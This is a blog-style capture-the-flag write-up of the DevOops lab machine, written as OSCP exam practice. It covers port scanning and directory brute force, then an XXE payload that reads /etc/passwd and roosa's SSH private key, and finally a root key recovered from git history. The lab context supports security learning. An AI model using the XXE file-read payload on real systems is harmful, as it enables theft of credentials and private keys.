DevOops is our seventh machine in the OSCP list provided by NetSec Focus! This machine was something new to me due to its XXE vulnerability and its privileges escalation using certain commands from git. There were many ways to do it where the usage of different language scripts could have been a good tool, but this time I decided to use BurpSuite as a must use tool. This is the seventh blog before my third attempt to the OSCP exam, so let’s get to it!
So, we start with a nmap scan to check what ports are open and what services are running in this machine.
nmap -sC -sV -p- -oN scan.nmap 10.10.10.91
So, we see that the port 5000 is running as a HTTP service, which means that we might visit with our browser and check what we can find!
Ok, it seems that it still under construction. Some directory brute force doesn’t seem a bad idea.
Directory Brute Force
Running dirsearch we have some results!
./dirsearch.py -u http://10.10.10.91:5000 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -f -e txt
Great! Looks like we have some good chances, so going to
/feed there is nothing else that is shown in the index page, but the interesting part comes when we see
XXE Vulnerability Execution
As the name says, we can upload a new file, it could be txt or XML, but look at the elements that is asking for which are the _Author, Subject, and Content, so this is the actual code that we used to test the upload feauture. Check that it has the elements that the website is asking.
<payload> <Author>Coffee</Author> <Subject>Junkie</Subject> <Content>Devoops</Content> </payload>
Then, once we upload the file with the name as
test.xml we have successfull results!
So, looking at the website from OWASP which talks about XXE there is a good chance to achieve RCE (Remote Code Execution) which in this case is not vulnerable, but we can achive some kind of file reading in this machine! This is the code in order to achive the file reading.
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <payload> <Author>&xxe;</Author> <Subject>Coffee</Subject> <Content>Junkiee</Content> </payload>
So, check that where it says
<Author>&xxe;<Author> we are invoking the file listing at the time to execute the file, and with the help from BurpSuite and its repeater feature, we can see a successful file reading.
What we see in the image above is the user roosa which might include some capabilities as well, things like reading the user flag!
Getting User Flag
So, knowing that we can obtain the user flag, we can actually read it from the repeater in burp just by invoking the flag through the HTTP petition!
Cool, we got it! But it’s better to obtain a reverse shell in order the complete this challenge as Odin rules.
Getting Reverse Shell
So, thinking around of what possible files we can read, it came up the idea to see if there was some kind of rsa key in the roosa directory, and efectively there was! Going to
/home/roosa/.ssh/id_rsa there was the ssh private key! which means we can log in with ssh.
So, let’s copy the key to our localhost and give it some permissions to connect to DevOops with the user roosa.
So, here we are with a proper shell and our flag! Wolah.
The privilege escalation was tricky here, I tried to exploir some SUIDs with no success and after listing a couple files in
/home/roosa/work/blogfeed there was this interesting file called
.git where it gave me the suspcion of finding something.
So, reading and looking around more blogs about this machine, I didn’t knwow that you can check the logs with a git command, so this actually helped to see that in this folder, somebody was trying to change an authorization key! This is the command for git.
git log --name-only --oneline
So here there is a way to compare this commits with a git command and see what information was replaced!
git diff 33e87c3 d387abf
Great! Seems that somebody was trying to change the key, from here I tried both keys where the one that gave a good result was the highlited in green which means that it was the replacement of the old one. So let’s save the key and give it permissions to log as root. Remember to do this as roosa because roosa has privileges to log in through ssh as root, we as localhost don’t have that privilege
And let’s log in and get the root flag!
So, after saving the key and giving it permission we could log in and get the flag! Challenge done!
Learning that there is something else from remote execution and how useful the ability to read remote files can be is very good! Also I didn’t have any knowledge about XXE where this machine was something eye openning. Also, the privilege escalation was curious because of the git commands and the ability to read old contributions and changes, definetely it was a great box!